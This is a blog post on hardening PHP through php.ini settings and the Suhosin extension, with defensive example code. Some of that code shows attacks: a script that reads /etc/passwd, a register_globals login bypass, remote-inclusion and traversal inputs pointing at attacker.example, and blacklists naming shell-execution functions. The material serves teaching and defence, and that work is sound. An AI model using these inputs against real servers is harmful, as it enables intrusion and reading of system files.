Some security settings of PHP

Keywords: PHP Session Database simulator

Happy New Year, everyone. I haven't updated my blog for another half month. Updates are fairly casual: I write about whatever comes to mind, as a convenient learning summary for everyone.

Recently I discussed PHP security with my colleagues and noted down some of what we learned.

Because PHP is a scripting language and several of its early design decisions were made before security was a priority, PHP projects carry a number of well-known risks. Looking only at configuration options, the following hardening can be done.

1. Block PHP error output.
In php.ini (commonly /etc/php.ini, but the file actually loaded depends on the distribution and on the SAPI: confirm it with php --ini for the command line and with phpinfo() or the FPM pool configuration for the web server), change the following value to Off:

display_errors=Off

Do not output error messages and stack information directly to the web page. They leak absolute paths, database and table names, query fragments and library versions that an attacker uses to plan the next step.

The right approach is:
Keep log_errors=On and point error_log at a file the web server does not serve, so the information remains available for troubleshooting without being shown to clients.


2. Block the PHP version.
By default PHP advertises its version in a response header, for example:
Response Headers X-Powered-By: PHP/7.2.0

Change the following value in php.ini to Off:

expose_php=Off

This removes only the X-Powered-By header. It does not touch the web server's own Server header (use ServerTokens Prod in Apache or server_tokens off in nginx for that), and the version can still be fingerprinted from behaviour, so treat this as hygiene rather than protection.


3. Turn off register_globals.
If register_globals is on, the values submitted by a form (and anything passed in the query string or in a cookie) are automatically registered as global variables. The code is as follows:

<form action="/login" method="post">
<input name="username" type="text">
<input name="password" type="password">
<input type="submit" value="submit" name="submit">
</form>


With register_globals enabled, the server-side script can read the user name and password simply as $username and $password. The danger is that the attacker controls the variable names as well as the values: every request parameter becomes a PHP variable, so a script that forgets to initialise a variable such as $authorized can have it pre-set from the query string. This is variable injection leading to authentication bypass or code-path manipulation, not "script injection" in the XSS sense.

The option is enabled in php.ini as follows:

register_globals=On

It is recommended to turn it off:

register_globals=Off

When it is off, request data can only be read explicitly from $_POST, $_GET, $_COOKIE and $_REQUEST (or through filter_input()). Note that register_globals was deprecated in PHP 5.3 and removed in PHP 5.4; on current PHP versions the directive no longer exists and the line is ignored, but code written for the old behaviour, or code that calls extract($_REQUEST), recreates exactly the same problem.
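As an added example (this is not code from the original post), the following script reproduces the register_globals bypass using extract(), which does in one line what register_globals did implicitly for every request, and shows the same login written safely. The check_credentials() function and its single user record are constructed for the demo.

```php
<?php
// Added example, not from the original post.
// check_credentials() and its one user record are constructed for the demo;
// a real application would look the password hash up in a database.
function check_credentials(string $username, string $password): bool
{
    static $users = null;
    if ($users === null) {
        $users = ['alice' => password_hash('correct horse battery staple', PASSWORD_DEFAULT)];
    }
    return isset($users[$username]) && password_verify($password, $users[$username]);
}

// VULNERABLE. register_globals turned every request parameter into a PHP
// variable before the script ran; extract() over the request array is the
// same thing written out. The script never initialises $authorized, so a
// request carrying authorized=1 pre-sets it and the password check is moot.
function login_with_register_globals(array $request): bool
{
    extract($request);                    // what register_globals did implicitly
    if (check_credentials($username ?? '', $password ?? '')) {
        $authorized = true;
    }
    return !empty($authorized);           // attacker-supplied value survives here
}

// FIXED. State is initialised explicitly, and input is read by name from the
// request array (in a real script: $_POST), so no request parameter can
// become a variable the code did not ask for.
function login_fixed(array $post): bool
{
    $authorized = false;
    $username   = (string) ($post['username'] ?? '');
    $password   = (string) ($post['password'] ?? '');
    if (check_credentials($username, $password)) {
        $authorized = true;
    }
    return $authorized;
}

// Constructed requests: a forged one carrying no credentials at all, and a real login.
$forged = ['authorized' => '1'];
$real   = ['username' => 'alice', 'password' => 'correct horse battery staple'];

var_dump(login_with_register_globals($forged)); // forged request, no password supplied
var_dump(login_fixed($forged));                 // same forged request against the fixed code
var_dump(login_fixed($real));                   // genuine credentials against the fixed code
```

Run it with php on the command line: the first call reports the caller as logged in although no password was ever sent, the second refuses the same request, and only the third succeeds. The fix is not the php.ini line alone; it is initialising state and reading input by name.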

 

4. File system restrictions
You can restrict the directories PHP may access with open_basedir.

Without the restriction, the following script (hack.php) placed in the web root reads /etc/passwd, the list of system accounts:

<?php

echo file_get_contents('/etc/passwd');

 

With the restriction in place the read fails with a warning and the file content is not displayed, so directories outside the web root cannot be read through PHP:

PHP Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www) in /var/www/hack.php on line 3
PHP Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/hack.php on line 3

(On the command line each warning appears twice, once as "PHP Warning:" on stderr from log_errors and once as "Warning:" on stdout from display_errors; with display_errors=Off as recommended in section 1 only the logged copy remains.)

The setting is as follows:

open_basedir=/var/www

Several directories can be listed separated by ":" on Unix (";" on Windows). An entry is a prefix match, so /var/www also allows /var/www2; add a trailing "/" to restrict to the directory itself. Include every directory PHP legitimately needs, in particular the session save path (/tmp by default) and any directory uploads are moved to, otherwise sessions and uploads fail with the same warning. open_basedir only governs PHP's own file operations; it does not sandbox processes started with exec(), system() and friends, and it is best set per application, for example with php_admin_value in the Apache vhost or in the PHP-FPM pool.
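To show what open_basedir is protecting against, here is an added example (not code from the original post) of the include pattern behind local and remote file inclusion, next to two hardened forms: a fixed allow-list of page names, and a realpath() containment check that does in code what open_basedir does in configuration, for cases where the filename genuinely has to be dynamic. The pages/ directory, the page names and the temporary demo directory are assumptions.

```php
<?php
// Added example, not from the original post. The pages/ directory and its
// contents are assumptions made for the demo.

// VULNERABLE: request data is used as the include path.
//   ?page=http://attacker.example/shell.txt   remote file inclusion; refused by
//                                             allow_url_include=Off (section 5)
//   ?page=../../../../etc/passwd              local inclusion / traversal; refused
//                                             by open_basedir when it is set
// Both settings are mitigations. The bug is that the path comes from the client.
function render_vulnerable(string $page): void
{
    include $page;
}

// HARDENED 1: map the request value onto a fixed set of files. The client
// supplies a key, never a path fragment, so wrappers and traversal are moot.
const PAGES = ['home' => 'home.php', 'about' => 'about.php'];

function resolve_page(string $page): ?string
{
    if (!array_key_exists($page, PAGES)) {
        return null;                      // unknown key: refuse, do not fall back to the raw value
    }
    return __DIR__ . '/pages/' . PAGES[$page];
}

function render_hardened(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        return;
    }
    include $path;
}

// HARDENED 2: for a dynamic filename (user-chosen attachment, template name),
// resolve it and check that the real location is still inside $base.
// realpath() collapses "..", "." and symlinks, so the prefix test runs on the
// real path rather than on the string the client sent.
// Returns the canonical path, or null if the file is missing or escapes $base.
function safe_path(string $base, string $name): ?string
{
    $base = realpath($base);
    if ($base === false) {
        return null;
    }
    // Anything with a scheme (http://, php://, data:, C:) or an embedded NUL is
    // refused up front; realpath() would fail on them anyway, but be explicit.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $name) || strpos($name, "\0") !== false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($candidate === false) {
        return null;
    }
    // Compare with the separator appended so /var/www does not accept /var/www2.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}

// Constructed demonstration with a temporary base directory and one real file.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'safe_path_demo';
if (!is_dir($base)) {
    mkdir($base);
}
file_put_contents($base . DIRECTORY_SEPARATOR . 'readme.txt', "ok\n");

var_dump(safe_path($base, 'readme.txt'));                          // inside the base directory
var_dump(safe_path($base, '../../../etc/passwd'));                 // resolves outside it, refused
var_dump(safe_path($base, 'http://attacker.example/shell.txt'));   // URL wrapper, refused
```

The allow-list form is preferable wherever the set of includable files is known; safe_path() is for the remaining cases, and open_basedir stays in place as the backstop for code you did not write.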

 

5. Prohibit remote resource access.

allow_url_fopen=Off

allow_url_include=Off

allow_url_include=Off stops include, require and their _once variants from loading code through http://, ftp:// and similar URL wrappers, which closes the classic remote file inclusion hole in code such as include($_GET['page']). It is the default and is safe to set everywhere. allow_url_fopen=Off goes further and also stops fopen(), file_get_contents() and friends from fetching URLs; that limits server-side request forgery through those functions, but it breaks legitimate HTTP calls made with them, so many sites leave allow_url_fopen on and use the curl extension (which neither setting affects) for outbound requests.
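Because the php.ini that is actually loaded differs between the CLI, mod_php and PHP-FPM, and because a pool, vhost or .htaccess can override individual directives, it is worth checking the running configuration rather than the file. The following audit script is an added example, not from the original post: it reads the settings from sections 1 to 5 through ini_get() and reports which ones still need fixing. It needs PHP 7.4 or later for the arrow functions, and the weak configuration array at the end is constructed only to show the report format.

```php
<?php
// Added example, not from the original post. Audits the php.ini settings from
// sections 1-5 as seen by the running interpreter.

// php.ini booleans reach ini_get() as "1" (On) or "" (Off); quoted or unusual
// spellings can arrive as text, so normalise all the forms PHP accepts.
function ini_bool(string $value): bool
{
    return !in_array(strtolower(trim($value)), ['', '0', 'off', 'no', 'false', 'none'], true);
}

// Returns one row per setting: [name, current, expected, ok].
// $override lets you audit a configuration map instead of the live one.
function audit_php_ini(?array $override = null): array
{
    $get = fn(string $key): string => $override === null
        ? (string) ini_get($key)            // false for an unknown directive becomes ""
        : (string) ($override[$key] ?? '');

    $booleans = [
        'display_errors'    => false,  // 1. never send errors to the client
        'log_errors'        => true,   //    ...but keep them in a log
        'expose_php'        => false,  // 2. no X-Powered-By header
        'register_globals'  => false,  // 3. gone since PHP 5.4; reads as "" on modern PHP and passes
        'allow_url_fopen'   => false,  // 5. no URL wrappers in fopen()/file_get_contents()
        'allow_url_include' => false,  //    no URL wrappers in include/require
    ];

    $rows = [];
    foreach ($booleans as $name => $expected) {
        $current = ini_bool($get($name));
        $rows[] = [$name, $current ? 'On' : 'Off', $expected ? 'On' : 'Off', $current === $expected];
    }

    // 4. open_basedir has no single right value; the check is that it is set at all.
    $basedir = $get('open_basedir');
    $rows[] = ['open_basedir', $basedir === '' ? '(unset)' : $basedir, '(set)', $basedir !== ''];

    // 1. with display_errors off, errors must go somewhere: require an explicit
    //    error_log file instead of relying on the SAPI default.
    $log = $get('error_log');
    $rows[] = ['error_log', $log === '' ? '(SAPI default)' : $log, '(file path)', $log !== ''];

    return $rows;
}

// Names of the settings that fail the audit.
function audit_failures(?array $override = null): array
{
    $failed = array_filter(audit_php_ini($override), fn(array $row): bool => !$row[3]);
    return array_map(fn(array $row): string => $row[0], array_values($failed));
}

function print_report(array $rows): void
{
    foreach ($rows as [$name, $current, $expected, $ok]) {
        printf("%-18s %-40s expected %-12s %s\n", $name, $current, $expected, $ok ? 'ok' : 'FIX');
    }
}

if (PHP_SAPI === 'cli') {
    // Constructed example of a stock, unhardened configuration.
    $weak = [
        'display_errors'  => '1', 'log_errors'        => '1', 'expose_php'   => '1',
        'allow_url_fopen' => '1', 'allow_url_include' => '',  'open_basedir' => '', 'error_log' => '',
    ];
    echo "Constructed weak configuration:\n";
    print_report(audit_php_ini($weak));

    echo "\nThis interpreter (" . (php_ini_loaded_file() ?: 'no php.ini loaded') . "):\n";
    print_report(audit_php_ini());
}
```

Run it as php audit.php for the CLI configuration. To audit what the web server actually uses, drop the file into a test vhost and request it once, since PHP-FPM and mod_php routinely load a different php.ini than the command line; remove it afterwards, as it is a configuration disclosure in its own right.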

Other third-party security extensions
6. Suhosin.
Suhosin is a protection system for PHP applications. It is designed to protect servers and users from known and unknown defects in PHP applications and in the PHP core (in practice it is useful and stops a class of smaller attacks). Suhosin has two independent parts, which can be used separately or together.

The first part is a patch for the PHP core that defends against buffer overflow and format string weaknesses in the engine itself (this part requires rebuilding PHP).

The second part is a PHP extension containing all the other protections (this is the convenient part: it is loaded like any other extension and is easy to install).

Note that the 0.9.x releases of Suhosin, including the one installed below, build only against PHP 5; they do not load into PHP 7 or later, so on a modern PHP the built-in settings above plus disable_functions are what you have.

Installing the extension

wget http://download.suhosin.org/suhosin-0.9.37.1.tar.gz
tar zxvf suhosin-0.9.37.1.tar.gz
cd suhosin-0.9.37.1/
phpize
./configure --with-php-config=/usr/local/bin/php-config   # point at the php-config of the interpreter you are hardening
make
make install        # copies suhosin.so into extension_dir; usually needs root
# Then load it from php.ini (or a conf.d snippet) and confirm with: php -m | grep -i suhosin

extension=suhosin.so


Features

  1. Simulation mode (violations are logged but not blocked)
  2. Adds two functions, sha256() and sha256_file(), to the PHP core
  3. Adds the crypt_blowfish algorithm to crypt() on all platforms
  4. Transparent protection for the phpinfo() page
  5. SQL database user protection (experimental)

Runtime protection

  1. Cookie encryption
  2. Prevents different types of inclusion vulnerabilities (remote URL inclusion can be denied or black/white listed; inclusion of uploaded files can be denied; directory traversal attacks are blocked)
  3. Allows preg_replace() to be disabled
  4. Allows eval() to be disabled
  5. Prevents infinite recursion by enforcing a maximum execution depth
  6. Supports black and white list configuration per vhost
  7. Provides separate black and white lists of functions for normal code and for code run through eval()
  8. Prevents HTTP response splitting
  9. Prevents scripts from raising the memory_limit option
  10. Protects PHP's superglobals from extract() and import_request_variables()
  11. Prevents newline (header injection) attacks on the mail() function
  12. Prevents attacks through preg_replace()

Session protection

  1. Session data encryption
  2. Session hijacking prevention
  3. Rejection of over-long session ids
  4. Rejection of malformed session ids

Session data is normally stored in plaintext on the server. Suhosin encrypts and decrypts $_SESSION transparently on the server, so when the session handler stores it in files, Memcache or a database the stored record is not readable as-is. This matters because session data often holds sensitive fields. The key is derived from suhosin.session.cryptkey and, optionally, the client's User-Agent, the document root and part of the remote address. Since that key lives in php.ini on the same host, this protects against another tenant, a shared /tmp or a leaked backup reading the store, not against an attacker who already has root on the server.

This feature is enabled by default and can also be adjusted in php.ini (generate your own key; the one below is only an example):

suhosin.session.encrypt = On
suhosin.session.cryptkey = zuHywawAthLavJohyRilvyecyondOdjo
suhosin.session.cryptua = On          ; mix the User-Agent into the key
suhosin.session.cryptdocroot = On     ; mix the document root into the key

;; IPv4 only: number of leading octets of the remote address mixed into the key / checked
suhosin.session.cryptraddr = 0
suhosin.session.checkraddr = 0


Cookie encryption

Cookies travel in HTTP headers in cleartext and sit in the browser where the user can edit them. Encrypting them protects the application against several attacks, such as

  • Cookie tampering: an attacker who guesses or edits other plausible cookie values (another user's id, an admin flag) ends up with ciphertext that no longer decrypts to anything useful.
  • Cross-application cookie reuse: misconfigured applications may share a session store, for example when every application on a host keeps its sessions in the default /tmp directory. With a different encryption key per application, a cookie issued by one application cannot be replayed against another.

Configuration of cookie encryption in php.ini:

suhosin.cookie.encrypt = On

;; the cryptkey should be generated, e.g. with 'apg -m 32'
suhosin.cookie.cryptkey = oykBicmyitApmireipsacsumhylWaps1
suhosin.cookie.cryptua = On
suhosin.cookie.cryptdocroot = On

;; whitelist/blacklist (use only one): cryptlist names the cookies to encrypt,
;; plainlist names the cookies left in cleartext (everything else is encrypted)
;suhosin.cookie.cryptlist = WALLET,IDEAS
suhosin.cookie.plainlist = LANGUAGE

;; IPv4 only
suhosin.cookie.cryptraddr = 0
suhosin.cookie.checkraddr = 0

Test

# The default PHP session store is the tmp directory
ls -lrt /tmp | grep sess
# Session file written before the extension was enabled
cat sess_ururh83qvkkhv0n51lg17r4aj6
# the record is plaintext
# Session file written after the extension was enabled
cat sess_ukkiiiheedupem8k4hheo0b0v4
# the record is ciphertext
# This shows why encrypting the stored session matters on a shared host

Blocking functions

White list

# Explicitly name the only functions that may be called (everything not listed is blocked)
suhosin.executor.func.whitelist = htmlentities,htmlspecialchars,base64_encode
suhosin.executor.eval.whitelist = htmlentities,htmlspecialchars,base64_encode

<?php
echo htmlentities('<test>');
eval('echo htmlentities("<test>");');

Under this configuration the script above runs (echo and eval are language constructs, not functions), but any other function call is rejected. A whitelist is therefore only workable for very small, fully known code bases; most deployments use a blacklist instead.

Blacklist

# Explicitly name the functions that must not be called
suhosin.executor.func.blacklist = assert,unserialize,exec,popen,proc_open,passthru,shell_exec,system,hail,parse_str,mt_srand
suhosin.executor.eval.blacklist = assert,unserialize,exec,popen,proc_open,passthru,shell_exec,system,hail,parse_str,mt_srand

The func.* lists apply to normal code and the eval.* lists to code run through eval(). Core PHP offers disable_functions for the same purpose without Suhosin, but it covers only internal functions and has no separate list for eval().

To see which calls the black or white list is rejecting, run in simulation mode and read the log. In simulation mode violations are logged but not blocked, which is how you tune the lists against real traffic before enforcing them; set suhosin.simulation = 0 to enforce.

suhosin.simulation = 1
suhosin.log.file = 511                       ; bitmask of alert classes to log; 511 logs all of them
suhosin.log.file.name = /tmp/suhosin-alert.log

Other configuration items

suhosin.executor.include.max_traversal    Maximum number of ".." segments allowed in an include path; paths with more are treated as traversal attempts and refused
suhosin.executor.include.whitelist        URL prefixes that may be included, comma separated
suhosin.executor.include.blacklist        URL prefixes that may not be included, comma separated
suhosin.executor.disable_eval = On        Disables the eval() function

suhosin.upload.max_uploads                Maximum number of files accepted in one request
suhosin.upload.disallow_elf               Reject uploads that are ELF executables
suhosin.upload.disallow_binary            Reject uploads that contain binary data
suhosin.upload.remove_binary              Strip binary data from uploads instead of rejecting them
suhosin.upload.verification_script        External script run against each uploaded file, for example to check the content for webshell signatures; the upload is dropped unless the script accepts it

With Suhosin you also get alert logs, which can be sent to syslog and, at the same time, to any other log file;

it can keep separate black and white lists per virtual host;

it can filter GET and POST requests, file uploads and cookies;

it can transparently encrypt sessions and cookies, and enforce limits on the request data a script receives;

and, unlike the original PHP hardening patch, the Suhosin extension is compatible with third-party extensions such as Zend Optimizer.

Posted by sledgeweb on Sat, 11 Jan 2020 05:43:44 -0800